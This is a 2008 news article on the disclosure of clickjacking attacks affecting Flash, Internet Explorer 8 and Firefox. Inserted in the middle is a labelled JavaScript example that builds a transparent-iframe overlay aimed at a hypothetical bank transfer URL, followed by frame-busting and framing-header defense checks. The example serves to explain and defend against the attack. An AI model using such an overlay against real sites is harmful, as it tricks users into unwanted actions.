Clickjacking details released after attack proof-of-concept emerges

By Dennis Fisher, Executive Editor
08 Oct 2008 | SearchSecurity.com


The details of the so-called clickjacking attacks have been released, and it turns out the class of problems affects a wide range of software, including Adobe Flash, Internet Explorer 8 and Firefox.


The attacks, which were first disclosed late last month, let attackers use a number of methods to trick users into clicking on malicious links, including overlaying entire pages, using malicious iframes and even turning off the security protections in Flash entirely. The vendors whose products are affected are at various points in the remediation process, but the researchers who discovered the attacks released the details Tuesday night after a proof-of-concept of one of the attacks hit the Web.

Robert Hansen, an application security researcher who discovered the attacks along with Jeremiah Grossman, chief technology officer of WhiteHat Security Inc., wrote in a blog post detailing the clickjacking attacks that there are a number of different ways to accomplish clickjacking, and that not all of them rely on JavaScript or cross-site request forgery (CSRF).

"First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn't. Some overlays entire pages over a page, some uses iframes to get you to click on one spot," Hansen wrote. "Some requires JavaScript, some doesn't. Some variants use CSRF to pre-load data in forms, some don't. Clickjacking does not cover any one of these use cases, but rather all of them."

The basic idea behind clickjacking is that it lets an attacker trick Web users into clicking on a malicious link or control when they think they're clicking on something completely benign. For example, in one of the scenarios that Hansen and Grossman described, an attacker could construct a malicious Web page designed to install a rootkit or other malware on a user's PC, then stack that page, rendered invisibly, over a harmless-looking page, say one with a Flash-based game on it. As the user clicks on the links and buttons he can see, the clicks actually land on the invisible page's controls, which the attacker has lined up with the decoy elements.
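The overlay described above, together with two defenses, as an added example that is not part of the original article or of the researchers' published material. The target URL, decoy label and header values are made-up assumptions. The block builds the transparent-iframe overlay the paragraph describes, then models two defenses that sites adopted only after this article was written: a frame-busting check for the client side, and a check of the X-Frame-Options and Content-Security-Policy frame-ancestors headers for the server side.

```javascript
// Added example, not from the article or the researchers' own code.
// All URLs, labels and header values below are made up for illustration.

// Attacker side: the target page is loaded in an iframe that is fully
// transparent and stacked above a decoy button. The user sees and aims at
// the decoy, but the click is delivered to the framed page, whose sensitive
// control the attacker has lined up with the decoy's position.
function buildClickjackPage(targetUrl, decoyLabel) {
  return `<!doctype html>
<html><head><style>
  #decoy  { position: absolute; top: 120px; left: 80px; width: 160px; height: 40px; }
  #target { position: absolute; top: 0; left: 0; width: 800px; height: 600px;
            opacity: 0; z-index: 10; border: 0; }
</style></head><body>
  <button id="decoy">${decoyLabel}</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Defense 1, client side: a frame-busting check written as a pure function
// over a window-like object so it can be exercised outside a browser.
// In a real page the body is hidden by CSS and only revealed when this
// returns false; a cross-origin `top` that throws is treated as framed.
function isFramed(win) {
  try {
    return win.self !== win.top;
  } catch (e) {
    return true;
  }
}

// Case-insensitive header lookup over a plain { name: value } object.
function getHeader(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

// Defense 2, server side: decide whether a response may be framed by a page
// at framerOrigin, from its X-Frame-Options and CSP frame-ancestors headers.
// Both headers postdate the article. Only the 'none', 'self', '*' and exact
// origin forms of frame-ancestors are modelled; when a frame-ancestors
// directive is present it takes precedence and X-Frame-Options is ignored,
// as the CSP specification requires.
function framingAllowed(headers, framerOrigin, pageOrigin) {
  const framer = framerOrigin.toLowerCase();
  const page = pageOrigin.toLowerCase();
  const csp = getHeader(headers, "content-security-policy");
  const directive = csp && /(?:^|;)\s*frame-ancestors\s+([^;]+)/i.exec(csp);
  if (directive) {
    const sources = directive[1].trim().split(/\s+/)
      .map(s => s.replace(/^'|'$/g, "").toLowerCase());
    if (sources.includes("none")) return false;
    if (sources.includes("*")) return true;
    if (sources.includes("self") && framer === page) return true;
    return sources.includes(framer);
  }
  const xfo = (getHeader(headers, "x-frame-options") || "").trim().toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framer === page;
  // No policy at all: the page is frameable by anyone, which was the
  // universal state of affairs when the article was written.
  return true;
}

// Stand-alone run: show the attack page and the effect of a policy.
const TARGET = "https://bank.example/transfer?to=attacker&amount=1000"; // hypothetical
console.log(buildClickjackPage(TARGET, "Play again"));
console.log(framingAllowed({}, "https://evil.example", "https://bank.example"));                             // true
console.log(framingAllowed({ "X-Frame-Options": "DENY" }, "https://evil.example", "https://bank.example"));  // false
```

The frame-busting function is deliberately the check only: the classic one-liner that rewrites `top.location` can be defeated by the framing page, which is why the robust pattern keeps the page hidden until the check passes rather than trying to escape the frame.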

Hansen and Grossman also discovered ways in which the attacks can be used to silently take control of a webcam or microphone installed on a victim's machine.

Many of the issues that the researchers identified involve the use of Flash. There are separate problems with Flash in Firefox on Mac OS X and Flash in a beta version of IE 8. Adobe is in the process of addressing the Flash vulnerabilities in its upcoming release of Flash 10, Hansen wrote in his post, and the NoScript add-on for Firefox (a third-party extension, not a Mozilla product) has already fixed a related problem in its latest releases.

In an interview about the attacks before the details were released, Grossman said that although the methods they used were known previously, their potential had been discounted.

"This issue has been long known. The Web security community knows about it," Grossman said. "But it has been for the most part underestimated as far as its potential impact. The browser vendors know what the problem is. But they don't know how or if they're going to address it. It's not a simple patch. It's probably a re-architecting of the browser security model. It's not just an Adobe bug. It's something that affects everyone."
